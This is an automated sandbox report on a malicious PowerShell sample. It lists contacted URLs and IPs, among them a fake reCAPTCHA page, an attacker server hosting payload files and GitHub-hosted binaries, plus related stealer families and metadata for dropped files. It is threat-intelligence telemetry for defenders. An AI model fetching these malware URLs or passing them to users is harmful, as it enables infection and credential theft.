https://www.youtube.com/	RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000008.00000002.2132331427.000001D0818C6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://go.mic	RegSvcs.exe, 0000000B.00000002.2124142825.0000000001458000.00000004.00000020.00020000.00000000.sdmp	false		high
https://view-reserve.com/recaptcha-verify.htmlX	mshta.exe, 00000003.00000003.2105666148.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2101288585.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2106417373.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2088287641.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2154237508.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.protware.com	mshta.exe, 00000003.00000003.2080596666.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2102151892.0000020E2D3B7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://view-reserve.com/recaptcha-verify.htmlU	mshta.exe, 00000003.00000002.2136717878.000002062A9E9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=dK492ur3	RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354rCannot	RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://checkout.steampowered.com/	RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://view-reserve.com/recaptcha-verify.htmlINetCookies	mshta.exe, 00000003.00000003.2085261392.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137137562.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA44000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.57.112	powershell.exe, 00000005.00000002.2129677364.0000024B80EA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129677364.0000024B80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D80EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D080227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D080EB5000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://view-reserve.com/recaptcha-verify.htmleS	mshta.exe, 00000003.00000003.2074933284.000002062AAA7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/;	RegSvcs.exe, 0000000D.00000002.2153761108.00000000011B6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://view-reserve.com/recaptcha-verify.html8	mshta.exe, 00000003.00000003.2085261392.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137137562.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA44000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.H2	powershell.exe, 00000005.00000002.2129677364.0000024B81662000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe	RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000008.00000002.2132331427.000001D081921000.00000004.00000800.00020000.00000000.sdmp	false		high
https://view-reserve.com/recaptcha-verify.html...	mshta.exe, 00000003.00000002.2152048754.0000020E2CC92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2074933284.000002062AAA7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://aka.ms/pscore6	powershell.exe, 00000000.00000002.2060609253.000002793F5CF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmp	false		high
https://recaptcha.net/recaptcha/;	RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://view-reserve.com/recaptcha-verify.htmldJ	mshta.exe, 00000003.00000002.2153759540.0000020E2CF10000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.H	powershell.exe, 00000007.00000002.2134150506.0000022D81662000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.protware.com/	mshta.exe, 00000003.00000003.2106417373.0000020E2D431000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2096936838.0000020E2CCD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2106547656.0000020E2D439000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2105666148.0000020E2D431000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2079685811.0000020E2D431000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2106126871.0000020E2CCD3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2154237508.0000020E2D43D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2088287641.0000020E2D431000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080802003.0000020E2CCD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2152346497.0000020E2CCD4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://view-reserve.com/recaptcha-verify.htmlC:	mshta.exe, 00000003.00000003.2096831350.000002062AAB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2136717878.000002062A9D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2085261392.000002062AA96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137977166.000002062AAB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2074933284.000002062AAA7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2105489121.000002062AAB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2088207114.000002062AAA3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://view-reserve.com/	mshta.exe, 00000003.00000003.2085261392.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137137562.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA44000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://medal.tv	RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://broadcast.st.dl.eccdnx.com	RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000008.00000002.2132331427.000001D081921000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.orgX	powershell.exe, 00000005.00000002.2129677364.0000024B8168F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D8166A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D081669000.00000004.00000800.00020000.00000000.sdmp	false		high
https://login.steampowered.com/	RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb	RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	false		high
http://92.255.57.112/1/1.pngX	powershell.exe, 00000005.00000002.2129677364.0000024B80EA9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://view-reserve.com/recaptcha-verify.htmlhttps://view-reserve.com/recaptcha-verify.html	mshta.exe, 00000003.00000003.2097676404.0000020E2CE95000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000005.00000002.2280800865.0000024B90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129677364.0000024B8191F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2333849561.0000022D90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D81923000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2321823186.000001D090073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D081921000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000005.00000002.2129677364.0000024B8168F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D8166A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D081669000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll	RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://92.255.57.112/1/3.pngX	powershell.exe, 00000008.00000002.2132331427.000001D080EB5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://92.255.Hr	powershell.exe, 00000008.00000002.2132331427.000001D081661000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://recaptcha.net	RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/	RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com	RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmp	false		high
http://127.0.0.1:27060	RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199724331900R	RegSvcs.exe, 0000000D.00000002.2151633719.000000000116A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/Prod/C:	edb.log.4.dr	false		high
https://help.steampowered.com/	RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
92.255.57.120	view-reserve.com	Russian Federation	42253	TELSPRU	true
92.255.57.112	unknown	Russian Federation	42253	TELSPRU	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1591695
Start date and time:	2025-01-15 10:08:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	00.ps1
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winPS1@20/19@13/4
EGA Information:	Successful, ratio: 37.5%
HCA Information:	Successful, ratio: 83% Number of executed functions: 126 Number of non-executed functions: 13
Cookbook Comments:	Found application associated with file extension: .ps1

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 2.23.242.162, 199.232.210.172, 4.175.87.197, 13.107.246.45, 20.3.187.198, 4.245.163.56, 172.202.163.200
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target RegSvcs.exe, PID 7296 because it is empty
Execution Graph export aborted for target mshta.exe, PID 6488 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 1644 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6528 because it is empty
Execution Graph export aborted for target powershell.exe, PID 744 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:09:05	API Interceptor	2x Sleep call for process: svchost.exe modified
04:09:05	API Interceptor	2x Sleep call for process: mshta.exe modified
04:09:07	API Interceptor	70x Sleep call for process: powershell.exe modified
04:09:11	API Interceptor	2422317x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
92.255.57.112	92.255.57.112.ps1	Get hash	malicious	PureCrypter	Browse
	92.255.57.112.ps1	Get hash	malicious	PureCrypter	Browse
	92.255.57_1.112.ps1	Get hash	malicious	XWorm	Browse
	book_lumm2.dat.exe	Get hash	malicious	XWorm	Browse
104.102.49.254	r4xiHKy8aM.exe	Get hash	malicious	Socks5Systemz	Browse	/ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
104.102.49.254	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	www.valvesoftware.com/legal.htm

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bg.microsoft.map.fastly.net	31070304561863532281.js	Get hash	malicious	Strela Downloader	Browse	199.232.210.172
	Inquiry.js	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	199.232.214.172
	new.bat	Get hash	malicious	Unknown	Browse	199.232.214.172
	2387315401298627745.js	Get hash	malicious	Strela Downloader	Browse	199.232.214.172
	92.255.57.112.ps1	Get hash	malicious	PureCrypter	Browse	199.232.210.172
	1475127682155276.js	Get hash	malicious	Strela Downloader	Browse	199.232.210.172
	Invdoc80.pdf	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
	Reversed order 24-25.pdf	Get hash	malicious	Unknown	Browse	199.232.210.172
	wmnq39xe8J.dll	Get hash	malicious	Wannacry	Browse	199.232.214.172
	Final-Agreement-Document#808977735.pdf	Get hash	malicious	HTMLPhisher	Browse	199.232.210.172
steamcommunity.com	92.255.57_1.112.ps1	Get hash	malicious	LummaC	Browse	104.102.49.254
	https://sreamconmymnltty.com/scerty/bliun/bolop	Get hash	malicious	Unknown	Browse	104.102.49.254
	62.122.184.98 (3).ps1	Get hash	malicious	LummaC	Browse	104.102.49.254
	lumma1.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	random.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	yTRd6nkLWV.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	XhlpAnBmIk.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	k7h8uufe6Y.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	G7T8lHJWWM.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	92.255.57_2.112.ps1	Get hash	malicious	LummaC	Browse	104.102.49.254

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELSPRU	92.255.57.112.ps1	Get hash	malicious	PureCrypter	Browse	92.255.57.112
	92.255.57.112.ps1	Get hash	malicious	PureCrypter	Browse	92.255.57.112
	WZ6RvDzQeq.exe	Get hash	malicious	Unknown	Browse	92.255.57.155
	WZ6RvDzQeq.exe	Get hash	malicious	Unknown	Browse	92.255.57.155
	2.ps1	Get hash	malicious	Unknown	Browse	92.255.57.155
	2.ps1	Get hash	malicious	Unknown	Browse	92.255.57.155
	92.255.57_1.112.ps1	Get hash	malicious	XWorm	Browse	92.255.57.112
	book_lumm2.dat.exe	Get hash	malicious	XWorm	Browse	92.255.57.112
	http://92.255.57.155/1/1.png	Get hash	malicious	Unknown	Browse	92.255.57.155
	92.255.57.155.ps1	Get hash	malicious	XWorm	Browse	92.255.57.155
AKAMAI-ASUS	92.255.57_1.112.ps1	Get hash	malicious	LummaC	Browse	104.102.49.254
	mips.elf	Get hash	malicious	Mirai	Browse	23.54.60.125
	EXTERNAL Your company's credit limit has changed!.msg	Get hash	malicious	Unknown	Browse	184.28.89.29
	https://sreamconmymnltty.com/scerty/bliun/bolop	Get hash	malicious	Unknown	Browse	104.102.49.254
	https://www.giselabravo.com/lblogin/logins	Get hash	malicious	Unknown	Browse	104.102.53.18
	Eastern Contractors Corporation Contract and submittal document.eml	Get hash	malicious	Unknown	Browse	2.19.126.97
	download.exe	Get hash	malicious	Babuk, Mimikatz	Browse	173.222.162.32
	mlfk8sYaiy.dll	Get hash	malicious	Wannacry	Browse	172.230.50.2
	XML-702.msi	Get hash	malicious	AteraAgent	Browse	2.23.77.188
	EFT_Payment_Notification_Gheenirrigation.html	Get hash	malicious	HTMLPhisher	Browse	2.19.126.89
TELSPRU	92.255.57.112.ps1	Get hash	malicious	PureCrypter	Browse	92.255.57.112
	92.255.57.112.ps1	Get hash	malicious	PureCrypter	Browse	92.255.57.112
	WZ6RvDzQeq.exe	Get hash	malicious	Unknown	Browse	92.255.57.155
	WZ6RvDzQeq.exe	Get hash	malicious	Unknown	Browse	92.255.57.155
	2.ps1	Get hash	malicious	Unknown	Browse	92.255.57.155
	2.ps1	Get hash	malicious	Unknown	Browse	92.255.57.155
	92.255.57_1.112.ps1	Get hash	malicious	XWorm	Browse	92.255.57.112
	book_lumm2.dat.exe	Get hash	malicious	XWorm	Browse	92.255.57.112
	http://92.255.57.155/1/1.png	Get hash	malicious	Unknown	Browse	92.255.57.155
	92.255.57.155.ps1	Get hash	malicious	XWorm	Browse	92.255.57.155

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	138745635-72645747.116.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	92.255.57_1.112.ps1	Get hash	malicious	LummaC	Browse	104.102.49.254
	2834573-3676874985.02.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	62.122.184.98 (3).ps1	Get hash	malicious	LummaC	Browse	104.102.49.254
	87.247.158.212.ps1	Get hash	malicious	LummaC	Browse	104.102.49.254
	lumma_phothockey.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	mWAik6b.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.102.49.254
	lumma1.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
37f463bf4616ecd445d4a1937da06e19	Inquiry.js	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	92.255.57.120
	138745635-72645747.116.exe	Get hash	malicious	Unknown	Browse	92.255.57.120
	2834573-3676874985.02.exe	Get hash	malicious	Unknown	Browse	92.255.57.120
	regsvr.exe	Get hash	malicious	Unknown	Browse	92.255.57.120
	0dsIoO7xjt.docx	Get hash	malicious	Unknown	Browse	92.255.57.120
	inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse	92.255.57.120
	1KaTo6P18Z.doc	Get hash	malicious	Unknown	Browse	92.255.57.120
	5UnAIdF7m2.docx	Get hash	malicious	Unknown	Browse	92.255.57.120
	x6yDsHJ9tr.exe	Get hash	malicious	Remcos, GuLoader	Browse	92.255.57.120
	LrBF2Z930N.exe	Get hash	malicious	Remcos, GuLoader	Browse	92.255.57.120

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.8306887952169721
Encrypted:	false
SSDEEP:	1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugd:gJjJGtpTq2yv1AuNZRY3diu8iBVqFX
MD5:	CDF2CA140BC0882ED73C804B176CEBFC
SHA1:	468D2720A67E10FD0046A696C5E86E699FF69DF4
SHA-256:	4F5243E19AFB906EDA7C70C080ECE79C4F105E0E37EDEF48F25A4AB97BED1774
SHA-512:	B5FD2EF53D2C5CCDF00553F35B508B68B15E036FD9C46A1E2E1EF46953E38006FC2AFDBF9E040620332C93EB1B0281238E152281A33934909D509D3AA7CC101D
Malicious:	false
Preview:	...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x5b5ab145, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.6585863003800341
Encrypted:	false
SSDEEP:	1536:xSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:xaza9v5hYe92UOHDnAPZ4PZf9h/9h
MD5:	CFAFA5B27B664B676DE1A53C2EB2D895
SHA1:	49C042F49F2FA4447C47EAED41371F452726A8B1
SHA-256:	954C9CA813077C8732C3884EC49217512DBDE773C8FB84B7B85F12B961A34440
SHA-512:	625DDF14DF9B2D88FD59482AB837B913E18AE3EFC4D31AAE8D072E1BE309D75545E9B6ADEC2D1C99588907015A53D27F3727EF859226E6E3D2D95A61E0FA2AAC
Malicious:	false
Preview:	[Z.E... ...............X\...;...{......................0.z..........{.......}W.h.\|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..................................MVm......}.....................'.....}...........................#......h.\|.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08109863688599644
Encrypted:	false
SSDEEP:	3:Atl6YeUNqk9jwurbGuAJkhvekl1l2QjllltollrekGltll/SPj:AqzmqkBwGrxlG2tGJe3l
MD5:	6B5E78FEE02989BCCB8B7A0E178947B7
SHA1:	3AFADEEE7DC66CF490A3266FE4A76EE8180C8FE3
SHA-256:	AC5C23B122947463AD266D052E65C27B284ED01FD66658E142C7394B71C8A247
SHA-512:	8A6A211FD6F0BC967E21150DC21C35A477239783AF8FF762CCFF8AC3E5EB83F8A731AC83B95EBFEC6624C7CF8E6431313242FF97BC16CA99FF5818391368B1A6
Malicious:	false
Preview:	8.......................................;...{.......}.......{...............{.......{...XL......{.....................'.....}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.2478978672539016
Encrypted:	false
SSDEEP:	6:kKS9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:FDImsLNkPlE99SNxAhUe/3
MD5:	AC0F9C5FC7A1281ED9960736941CD647
SHA1:	F813C765E68593297EECDF99F9C1225C045D3667
SHA-256:	61269CEF64A2EB99F0DE33041FDA852B62A46395123D52A40F233191F958CCC0
SHA-512:	A76D3B4265BB5A1C15E660B8A855A388C7E8E9D9374CD756A99ADAA93412B9E727847705836358AFDCE14E573913EFD369F1C0AA10EAD1AE4E171BB8940D3E58
Malicious:	false
Preview:	p...... ...........(-g..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
